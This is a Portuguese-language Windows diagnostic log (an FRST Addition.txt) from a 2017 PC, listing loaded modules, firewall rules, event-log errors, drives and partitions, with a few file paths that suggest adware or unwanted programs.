2017-03-15 04:58 - 2017-03-04 03:31 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2017-03-15 04:58 - 2017-03-04 03:12 - 09760768 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-03-15 04:58 - 2017-03-04 03:05 - 01401856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-03-15 04:58 - 2017-03-04 03:05 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2017-04-12 14:17 - 2017-03-28 02:07 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2017-04-12 14:17 - 2017-03-28 02:08 - 02424320 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-04-12 14:17 - 2017-03-28 02:11 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-04-11 02:56 - 2017-04-11 02:57 - 00077312 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2017-04-11 02:56 - 2017-04-11 02:57 - 00189952 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2017-04-11 02:56 - 2017-04-11 02:57 - 42507264 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2017-04-11 02:56 - 2017-04-11 02:57 - 02334184 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.13.133.0_x64__kzf8qxf38zg5c\skypert.dll
2017-04-17 20:49 - 2017-04-13 00:08 - 00116400 _____ () C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
2016-09-15 12:51 - 2016-09-15 12:51 - 00679624 _____ () C:\Users\Hakaz7\AppData\Local\Microsoft\OneDrive\17.3.6381.0405\ClientTelemetry.dll
2017-03-24 10:48 - 2017-03-24 10:48 - 63944280 _____ () C:\Program Files (x86)\Opera\44.0.2510.857\opera_browser.dll
2017-03-24 10:48 - 2017-03-24 10:47 - 02101336 _____ () C:\Program Files (x86)\Opera\44.0.2510.857\libglesv2.dll
2017-03-24 10:48 - 2017-03-24 10:47 - 00087128 _____ () C:\Program Files (x86)\Opera\44.0.2510.857\libegl.dll
2017-04-17 20:49 - 2017-04-17 00:03 - 00106496 _____ () c:\programdata\software\apple\apps\notification.dll
2017-04-17 20:49 - 2017-04-17 00:03 - 00106496 _____ () C:\ProgramData\Software\Apple\Apps\Notification.dll
==================== Alternate Data Streams (Whitelisted) =========
(Se uma entrada for incluída na fixlist, somente o ADS será removido.)
==================== Modo de Segurança (Whitelisted) ===================
(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)
==================== EXE Associação (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)
==================== Internet Explorer confiável/restrito ===============
(Se uma entrada for incluída na fixlist, será removida do Registro.)
IE trusted site: HKU\S-1-5-21-1487806579-2887001220-3690848270-1000\...\samsungsetup.com -> hxxp://www.samsungsetup.com
==================== Hosts Conteúdo: ===============================
(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)
2009-07-13 23:34 - 2016-01-29 19:12 - 00000027 ____A C:\WINDOWS\system32\Drivers\etc\hosts
127.0.0.1 localhost
==================== Outras Áreas ============================
(Atualmente não há nenhuma correção automática para esta seção.)
HKU\S-1-5-21-1487806579-2887001220-3690848270-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Hakaz7\Documents\EGDownloads\visão.jpg
DNS Servers: 200.189.80.124 - 200.189.80.110
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.
==================== MSCONFIG/TASK MANAGER ítens desabilitados ==
(Atualmente não há nenhuma correção automática para esta seção.)
==================== Regras do Firewall (Whitelisted) ===============
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [WirelessDisplay-Infra-In-TCP] => (Allow) %systemroot%\system32\CastSrv.exe
FirewallRules: [UDP Query User{727280AB-00B9-43CD-86B0-B628ECAA2748}C:\program files\comicrack\comicrack.exe] => (Block) C:\program files\comicrack\comicrack.exe
FirewallRules: [TCP Query User{B5578DD4-5AD8-4C9E-8859-67531B323C37}C:\program files\comicrack\comicrack.exe] => (Block) C:\program files\comicrack\comicrack.exe
FirewallRules: [UDP Query User{2173846D-BE62-4434-BAC0-2B5C666DBB60}C:\users\hakaz7\desktop\u1504.exe] => (Allow) C:\users\hakaz7\desktop\u1504.exe
FirewallRules: [TCP Query User{6C901EC6-9AC6-4C79-AE1F-E7A0BB4FC635}C:\users\hakaz7\desktop\u1504.exe] => (Allow) C:\users\hakaz7\desktop\u1504.exe
FirewallRules: [UDP Query User{425650B8-A73E-4262-9915-00BB1328DE1A}C:\users\hakaz7\desktop\pendrive dedé\pendrive dedé\fg752p.exe] => (Block) C:\users\hakaz7\desktop\pendrive dedé\pendrive dedé\fg752p.exe
FirewallRules: [TCP Query User{71FEE34B-14AC-4448-8990-D3037358E40B}C:\users\hakaz7\desktop\pendrive dedé\pendrive dedé\fg752p.exe] => (Block) C:\users\hakaz7\desktop\pendrive dedé\pendrive dedé\fg752p.exe
FirewallRules: [UDP Query User{FE981564-E1DA-40A4-BE8A-20DAF1DB712E}C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [TCP Query User{973A1226-CB31-44FB-A343-2C2C3B942D59}C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe] => (Allow) C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{2F948DFB-9F89-4F7C-B57A-CCE70298D179}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{F70EB1CB-4C4C-4B7B-85C0-02BFF8301C6E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{AE6F9839-9CC3-4226-AF12-E1B67F2C41C9}] => (Allow) C:\Program Files\Nightly\firefox.exe
FirewallRules: [{500A9256-49D3-4BAC-AEB9-4B1EE56300F8}] => (Allow) C:\Program Files\Nightly\firefox.exe
FirewallRules: [TCP Query User{BA9669A7-D367-4E07-86A1-3DC29A57C5B7}C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [UDP Query User{7A97CE21-0EA4-417D-B648-9B2524714F93}C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe] => (Block) C:\users\hakaz7\appdata\roaming\utorrent\utorrent.exe
FirewallRules: [{6B1A2B88-5170-41C3-A53B-051873648F21}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{035ED720-88D5-4ADA-8677-5A8092FBAAF1}] => (Allow) C:\Program Files (x86)\Simple Port Forwarding\spf.exe
FirewallRules: [{23A6B6C3-D122-415E-96E5-A6381D1B932F}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{D4FD9A26-9070-44B9-A8DA-8B9CABDE0D1A}] => (Allow) LPort=2869
FirewallRules: [{FA56EC70-193E-4206-B035-DAB3DF538830}] => (Allow) LPort=1900
FirewallRules: [TCP Query User{4F74E4AC-1C7F-4E39-AEB8-23A3918E9BFC}C:\users\hakaz7\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\hakaz7\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{A2412B98-FC4F-4E58-BD46-719D5E12A58D}C:\users\hakaz7\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\hakaz7\appdata\roaming\spotify\spotify.exe
FirewallRules: [{06D1A383-5285-4FB0-B75C-A4B1D8F83485}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe
FirewallRules: [{8EC69FF0-F5A9-4DFC-8331-63B9BB9E5781}] => (Allow) C:\Program Files\DriversCloud.com\DriversCloud.exe
FirewallRules: [TCP Query User{F11581BB-7FF9-4C09-97AB-31C22FEAB8D6}C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe] => (Allow) C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe
FirewallRules: [UDP Query User{709BF627-EF6A-467F-BB8C-A3B16799011C}C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe] => (Allow) C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe
FirewallRules: [TCP Query User{ADD77E72-73A3-405B-8538-E42E851BC523}C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe] => (Allow) C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe
FirewallRules: [UDP Query User{46F5DF35-2F20-404C-A8BC-4103C1998C17}C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe] => (Allow) C:\users\hakaz7\appdata\local\temp\kmsnano\qemu-system-i386.exe
FirewallRules: [{9F229D1E-C3B6-4003-AA4C-8F8DA6A24279}] => (Allow) C:\Program Files (x86)\Opera\43.0.2442.1144\opera.exe
FirewallRules: [{40AB0920-B4FE-4491-A51E-EBDA58313C0A}] => (Allow) C:\Program Files (x86)\Opera\44.0.2510.857\opera.exe
FirewallRules: [{2EB8D542-998D-4212-B6BD-95A24A9F6172}] => (Allow) C:\Program Files (x86)\Eastness\Application\chrome.exe
FirewallRules: [{850DCA74-5BBB-4944-A87D-0A8D7E1D5AFB}] => (Allow) C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
FirewallRules: [{0F38ED4F-1549-4D0C-B7A9-2D31A9DD575A}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe
FirewallRules: [{7C0CCBA7-2D84-47CA-B418-F4D4B5EADEF0}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Pontos de Restauração =========================
01-04-2017 13:58:49 Ponto de Verificação Agendado
11-04-2017 03:58:15 Ponto de Verificação Agendado
19-04-2017 15:00:17 Ponto de Verificação Agendado
==================== Dispositivos Apresentando Falhas No Gerenciador =============
Name: Mouse compatível com PS/2
Description: Mouse compatível com PS/2
Class Guid: {4d36e96f-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
Name: Teclado Padrão PS/2
Description: Teclado Padrão PS/2
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: (teclados padrões)
Service: i8042prt
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (04/19/2017 03:00:30 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Falha dos Serviços de Criptografia ao processar a chamada de OnIdentity() no Objeto de Gravador do Sistema..
Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocolo Microsoft LLDP.
System Error:
Acesso negado.
.
Error: (04/19/2017 11:57:50 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADMINISTRADOR)
Description: Falha na ativação do aplicativo Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge com o erro: -2147023170. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/18/2017 08:44:58 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: ADMINISTRADOR)
Description: Falha na ativação do aplicativo Microsoft.BingWeather_8wekyb3d8bbwe!App com o erro: -2144927148. Veja o log Microsoft-Windows-TWinUI/Operational para obter informações adicionais.
Error: (04/18/2017 12:30:53 PM) (Source: COM) (EventID: 10031) (User: )
Description: {2CD39202-3A2F-4935-9A86-65B919919A7F}
Error: (04/18/2017 08:07:57 AM) (Source: COM) (EventID: 10031) (User: )
Description: {2CD39202-3A2F-4935-9A86-65B919919A7F}
Error: (04/16/2017 05:06:36 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
Error: (04/15/2017 06:31:17 PM) (Source: COM) (EventID: 10031) (User: )
Description: {2CD39202-3A2F-4935-9A86-65B919919A7F}
Error: (04/14/2017 10:20:56 PM) (Source: COM) (EventID: 10031) (User: )
Description: {2CD39202-3A2F-4935-9A86-65B919919A7F}
Error: (04/13/2017 06:40:08 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: BITSC:\Windows\System32\bitsperf.dll8
Error: (04/13/2017 03:56:43 PM) (Source: COM) (EventID: 10031) (User: )
Description: {2CD39202-3A2F-4935-9A86-65B919919A7F}
Erros de Sistema:
=============
Error: (04/21/2017 02:04:26 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (04/21/2017 01:59:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço egGetSvc foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (04/19/2017 10:45:13 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (04/19/2017 10:45:03 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço egGetSvc foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (04/19/2017 11:57:12 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (04/19/2017 11:56:58 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço egGetSvc foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (04/18/2017 08:05:28 AM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (04/18/2017 08:05:13 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço egGetSvc foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (04/17/2017 10:12:06 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
Error: (04/17/2017 10:03:09 PM) (Source: DCOM) (EventID: 10016) (User: AUTORIDADE NT)
Description: específico do aplicativoLocalAtivação{8D8F4F83-3594-4F07-8369-FC3C3CAE4919}{F72671A9-012C-4725-9D2F-2A4D32D65169}AUTORIDADE NTSISTEMAS-1-5-18LocalHost (Usando LRPC)Não DisponívelNão Disponível
==================== Informações da Memória ===========================
Processador: Intel(R) Core(TM)2 Duo CPU E7500 @ 2.93GHz
Percentagem de memória em uso: 60%
RAM física total: 2009.33 MB
RAM física disponível: 803.11 MB
Virtual Total: 4057.33 MB
Virtual disponível: 2544.07 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:397.08 GB) (Free:46.99 GB) NTFS
Drive e: (Seagate Expansion Drive) (Fixed) (Total:931.51 GB) (Free:608.62 GB) NTFS
Drive f: (MULTIBOOT) (Removable) (Total:7.44 GB) (Free:6.37 GB) FAT32
Drive g: () (Removable) (Total:1.86 GB) (Free:1.86 GB) FAT32
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (Size: 465.8 GB) (Disk ID: 4A5A8254)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=397.1 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=68.1 GB) - (Type=05)
Partition 4: (Not Active) - (Size=450 MB) - (Type=27)
========================================================
Disk: 1 (Size: 931.5 GB) (Disk ID: 5ED0A206)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)
========================================================
Disk: 2 (Size: 7.5 GB) (Disk ID: 00000000)
Partition: GPT.
========================================================
Disk: 3 (Size: 1.9 GB) (Disk ID: 20736F63)
No partition Table on disk 3.
==================== Fim de Addition.txt ============================